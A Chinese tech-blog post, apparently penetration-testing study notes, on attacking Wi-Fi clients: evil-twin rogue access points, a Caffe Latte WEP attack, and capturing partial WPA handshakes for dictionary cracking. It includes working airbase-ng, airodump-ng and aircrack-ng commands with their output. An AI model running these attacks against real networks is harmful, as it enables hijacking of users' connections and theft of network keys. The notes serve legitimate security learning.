攻击无线客户端

最新推荐文章于 2022-04-19 10:42:05 发布
最新推荐文章于 2022-04-19 10:42:05 发布
阅读量616 收藏 1
点赞数
分类专栏: 无线渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34620855/article/details/103914542
版权

文章目录

蜜罐和误关联攻击

  • 原理

通常,当诸如笔记本之类的无线客户端启动完毕时,会探测之前曾经连接过的无线网络。对基于Windows的无线客户端而言,那些连接过的无线网络会存储在首选网络列表(Prefered Network List,PNL) 。除此之外,Windows客户端也会列出其无线网卡接收范围内所有的可供连接的无线网络。

  • 攻击措施
  1. 暗中监视无线客户端对无线网络的探测(wireshark,airodump…),探测ESSID与无线客户端所搜相同的无赖AP。
  2. 搭建ESSID与附近AP相同的无赖AP,诱使无线客户端来连接。

蜜罐攻击实施

对无线客户端而言,若无赖AP提供的信号强度要强于合法AP时,那么其断线重连后会连接至无赖AP

攻击对象网络设备:

7A:EB:14:A9:96:6E  -64      644       27    0  10  270  OPN              Open_Wireless
7A:EB:14:A9:96:6E  A0:8D:16:11:D9:99  -27    1e- 1     40      389  xiaoju,TP-LINK_A7B4,Open_Wireless

在这里插入图片描述

  • 开启无赖AP
root@yue:~# airbase-ng -a 7A:EB:14:A9:96:6E --essid "Open_Wireless" -c 10 wlan1mon
15:32:08  Created tap interface at0
15:32:08  Trying to set MTU on at0 to 1500
15:32:08  Trying to set MTU on wlan1mon to 1800
15:32:08  Access Point with BSSID 7A:EB:14:A9:96:6E started.

  • 断开连接
    在这里插入图片描述在这里插入图片描述

  • 客户端连接到无赖AP
    在这里插入图片描述

15:53:21  Client A0:8D:16:11:D9:99 associated (unencrypted) to ESSID: "Open_Wireless"
15:53:21  Client A0:8D:16:11:D9:99 associated (unencrypted) to ESSID: "Open_Wireless"
15:53:21  Client A0:8D:16:11:D9:99 associated (unencrypted) to ESSID: "Open_Wireless"
15:53:22  Client A0:8D:16:11:D9:99 associated (unencrypted) to ESSID: "Open_Wireless"
15:53:22  Client A0:8D:16:11:D9:99 associated (unencrypted) to ESSID: "Open_Wireless"
15:53:22  Client A0:8D:16:11:D9:99 associated (unencrypted) to ESSID: "Open_Wireless"
15:53:22  Client A0:8D:16:11:D9:99 associated (unencrypted) to ESSID: "Open_Wireless"

Caffe Latte攻击

Caffe Latte攻击是一种WEP攻击,借此攻击,黑客只需要通过无线客户端即可获取到授权网络的WEP的密钥。该攻击不用让无线客户端接近需要连接的的WEP网络,通过孤立的无线客户端,即可破解WEP密钥。

  1. 配置实验环境
需授权ap: 加密方式 WEP
令客户端先连接至该AP

  1. 令AP断电,使客户端断开连接,并搜索WEP网络

  2. 部署无赖AP 加密方式WEP

root@yue:~# airbase-ng -a 7A:EB:14:A9:96:6E --essid "Open_Wireless" -L -W 1 -c 10 wlan1mon
16:47:04  Created tap interface at0
16:47:04  Trying to set MTU on at0 to 1500
16:47:04  Access Point with BSSID 7A:EB:14:A9:96:6E started.

  1. 只要无线客户端连接该无赖AP,airbase-ng工具就会发起Caffe Latte攻击

  2. 启动airodump-ng抓包,aircrack破解即可

airodump-ng wlan1mon -c chanel --essid ap_ssid -w prefix
aircrack-ng filename

未进行测试

解除验证和取消关联攻击

deauth数据包

Hirte攻击

在不碰AP的情况下破解WPA-Personal

WPA/WPA2加密分析时主要通过对WPA的四次握手信息的抓取,再进行字典攻击。

申请者 无线AP 探测请求--响应(验证RR,关联RR) 预置共享密钥 256位(PSK) 预置共享密钥 256位(PSK) 消息1 无线AP随机数(A-Nonce) 临时密钥(PTK) 临时密钥(PTK) 消息2 申请者随机数(S-Nonce)+MIC 消息3 密钥安装 消息4 密钥安装确认 申请者 无线AP

破解的关键

  1. 网络的SSID
  2. 无线AP随机数 A-Nonce(Authenticator Nonce)
  3. 申请者随机数 S-Nonce(Supplicant Nonce)
  4. 无线AP MAC 地址
  5. 申请者MAC地址

无需从4次握手相对应的4条信息中提取上述的信息,有两条消息就okay了:消息1,2。

要破解WPA-PSK,需要搭建WPA-PSK蜜罐,当无线客户端连接这个蜜罐时,只有消息1和消息2会正常传递。由于未知WPA-PSK密码,因此密码无法发送消息3。但是获取消息1,2就包含了所有的信息。

  1. 部署网络环境
7A:EB:14:A9:96:6E  -51       85        5    0  10  270  WPA2 CCMP   PSK  Open_Wireless
7A:EB:14:A9:96:6E  A0:8D:16:11:D9:99  -24    0 - 1     83       35  TP-LINK_A7B4,xiaoju,Open_Wireless

在这里插入图片描述在这里插入图片描述
2. 开启蜜罐WPA-PSK,-Z 2 启用一个TKIP机制的WPA-PSK蜜罐

-z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type          : same as -z, but for WPA2

root@yue:~# airbase-ng -a 7A:EB:14:A9:96:6E --essid "Open_Wireless" -Z 2 -c 10 wlan1mon
18:57:06  Created tap interface at0
18:57:06  Trying to set MTU on at0 to 1500
18:57:06  Access Point with BSSID 7A:EB:14:A9:96:6E started.

抓包数据
在这里插入图片描述在这里插入图片描述

破解
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

浅谈安全管理平台中的事件关联分析
云翼说安全
03-09 3601
在当今社会中,随着信息技术的迅猛发展,企业内部的网络环境正面临着复杂多变的信息安全问题。这里既有来自于互联网对企业内网的各种入侵和攻击威胁,也有来自于企业内网中的违规操作和信息泄漏。为了应对层出不究的网络攻击和系统漏洞,许多企业先后部署了防火墙、入侵检测与防护系统、漏洞扫描系统、病毒防护系统等安全产品。但由于这些安全产品都仅仅防堵来自某个方面的安全威胁,于是形成了一个个安全防御孤岛...
Kali Linux 无线渗透测试入门指南 第六章 攻击客户端
热门推荐
龙哥盟
10-27 4万+
第六章 攻击客户端 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 安全强度取决于最弱的部分。 – 信息安全领域的名言 多数渗透测试者似乎把全部注意力都放在 WLAN 设施上,而不会注意无线客户端。但是要注意,黑客也可以通过入侵无线客户端来获得授权网络的访问权。这一章中,我们
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1717
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
基于攻击行为的报警关联、攻击场景构建
qq_30683393的博客
04-27 556
Cuppens等在MIRADOR项目中通过报警关联分析来提炼攻击者的入侵策略。对攻击行为的前提、后果进行建模,根据后续行为的前提与先前行为的后果是否匹配来对两个行为进行关联。 当检测到攻击行为时,搜索满足匹配条件的攻击路径来构造攻击者的规划。 当有多条攻击路径对应着不同的攻击目标时,选择最短的攻击路径对应的攻击目标作为攻击者的入侵意图。 随着事件数量的增多,关联搜索空间急剧增大,不适合大规模的在...
无线渗透(四)WPA攻击
weixin_41082546的博客
03-12 663
WPA PSK攻击 只有一种密码破解方法 WPA不存在WEP的弱点 只能暴力破解 CPU资源 时间 字典质量 网上共享的字典 泄露密码 地区电话号码段 Crunch生成字典 kali中自带的字典文件 WPA PSK攻击 PSK破解过程 开始抓包并保存 Deauthentication攻击获取4步握手信息 使用字典暴力破解 root@kali:~# service network-mana...
无线网络攻击论文-Beacon泛洪攻击.docx
最新发布
06-19
Beacon泛洪攻击的原理在于利用无线网络通信的特性,即AP与客户端之间的认证和关联过程。当AP收到大量的伪造Beacon帧时,它会尝试响应并处理这些请求,导致其无法正常处理合法用户的连接请求。同时,客户端也可能因为...
clientSniff:首个针对无线客户端的黑客工具
Deauthentication攻击是一种常见的无线网络攻击手段,攻击者通过发送伪造的Deauthentication帧给目标无线客户端或接入点,从而强制它们断开当前的网络连接。一旦客户端被断开连接,攻击者就可能利用客户端重新连接时...
无线网络故障快速修复】:3小时精通无线客户端和网桥问题诊断
![【无线网络故障快速修复】:3小时精通无线...随后,深入分析了无线客户端故障的常见问题和诊断工具,探讨了性能优化和安全防护策略。在无线网桥部分,重点讨论了连接稳定性、传输效率和配置兼容性的问题及其解决方
Ralink AP与无线客户端:无缝连接的秘诀
[Ralink AP与无线客户端:无缝连接的秘诀](https://opengraph.githubassets.com/c8c22a5dbcd2f8eed0a69794241558b60f369b4887b977b66ed62fb321a47fad/chris1111/Wireless-Ralink-Panel-Utility) # 摘要 本文全面...
电信设备-通过无线移动客户端装置检测并缓解交换机上的过载.zip
09-19
本主题主要关注如何通过无线移动客户端装置来检测并缓解交换机上的过载情况。 首先,我们要理解交换机过载的原因。这可能是由于网络流量的突发性增加,如大量用户同时在线观看视频,或者网络中存在病毒或DDoS攻击...
Kali-WIFI攻防(三)----wifite自动化WEP/WPA破解工具
fendo
04-05 2万+
一、工具简介 wifite是一款自动化wep、wpa破解工具,不支持windows和osx。wifite的特点是可以同时攻击多个采用wep和wpa加密的网络。wifite只需简单的配置即可自动化运行,期间无需人工干预。  产品特点: 通过信号强度(dB)对目标进行排序; 首先破解最近的接入点自动取消身份验证隐藏网络的客户端以显示SSID许多过滤器可以准确地指定要攻击
无线攻击 --aircrack-ng套件之一:Airbase-ng(攻击客户端多用途工具)
Kevin's Blog
03-06 4595
文章目录一、用法概述二、命令格式用法示例 一、用法概述   airbase是aircrack-ng套件之一。是一个多用途工具,旨在攻击客户端而不是接入点本身,功能: 实施Caffe-Latte WEP客户端攻击 实施Hirte WEP客户端攻击 捕获WPA / WPA2握手 充当ad-hoc接入点 充当完整的接入点 能够按SSID或客户端MAC地址进行过滤 能够操纵和重新发送数据包 能够解密发...
WEP-渗透WEP新思路--Hirte
qq_44418229的博客
04-19 2435
WEP-渗透WEP新思路--Hirte
重置iptables
weixin_33756418的博客
03-02 1056
# reset the default policies in the filter table.iptables -P INPUT ACCEPTiptables -P FORWARD ACCEPTiptables -P OUTPUT ACCEPT# reset the default policies in the nat table.iptables -t nat -P PREROUTING ...
无线渗透攻击分析
风起的博客
07-27 7584
本章节讲解的是关于无线攻击方面的知识,其中对一些无线渗透技术进行了分析,目前的无线安全其实非常的不可信,甚至无需连接无线网即可进行攻击.获取到个人信息,希望大家能够注意个人安全,从本文章中能够有所收获!
linux中dns服务器的搭建
往事流年的博客
04-11 3万+
1,使用rpm -qa 选项查看系统中是否有已经安装dns服务如果系统中没有dns服务用户可以通过修改yum源使用yum -y install 或rpm -ivh进行安装,由于dns的依赖包较多建议使用yum -y insatll安装,这里采用yum -y install 选项进行安装 [root@localhost~]#yum -y install bind 2,安装完成后...
网络安全工程师演示:原来我的计算机可以这样被为所欲为!
Kali与编程
09-17 246
一、课前准备 使用kali工具攻击Windows目标计算机并获取目标计算机的管理员权限。 二、课程目标 1.通过学习本课程,了解获取Windows目标计算机管理权限后,可以对其进行若干的操作。 2.通过学习本课程,达到充分利用kali工具所获取信息提高后续渗透测试效率的目标。 三、课程内容 1.远程查看目标计算机的系统信息。 命令:C:\Windows\system32>systeminfo 回车 命令行结果显示界面:(因不支持中文编译,故界面出现乱码,在CMD中输入chcp65001) 一、课前
记录一下airbase-ng 创建AP DHCP服务配置问题
weixin_42985754的博客
02-07 708
1 记录一下airbase-ng 创建AP DHCP服务配置问题 由于工作需要用airbase-ng创建的 Soft AP 进行wifi异地打卡,正好近期在学习linux系统,索性就拿来练练手。 先说一下想用丁丁的wifi打卡只需要mac地址和打卡的wifi的mac地址相同即可,其他的无限制,而且实现的方式多种多种,这里记录一下用ubuntu 下的工具实现的流程。 工具:一台安装ubuntu系统...
无线网络渗透测试-Gerix Wifi Cracker破解无线网络
HBohan的博客
06-25 1368
Gerix破解WEP加密的无线网络 在前面介绍了手动使用Aircrack-ng破解WEP和WPA/WPA2加密的无线网络。为了方便,本小节将介绍使用Gerix工具自动地攻击无线网络。使用Gerix攻击WEP加密的无线网络。具体操作步骤如下所示。 (1)下载Gerix软件包。执行命令如下所示: root@kali:~# wget https://bitbucket.org/SKin36/gerix-wifi-cracker-pyqt4/ downloads/gerix-wifi- cracker-maste
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值